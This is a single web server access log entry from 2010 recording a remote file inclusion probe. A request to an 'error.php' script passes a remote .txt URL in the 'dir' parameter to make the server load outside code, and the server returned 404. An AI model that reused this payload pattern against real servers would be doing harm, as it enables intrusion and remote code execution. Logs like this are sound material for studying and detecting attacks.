77.241.83.107 - - [03/Mar/2010:11:35:06 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
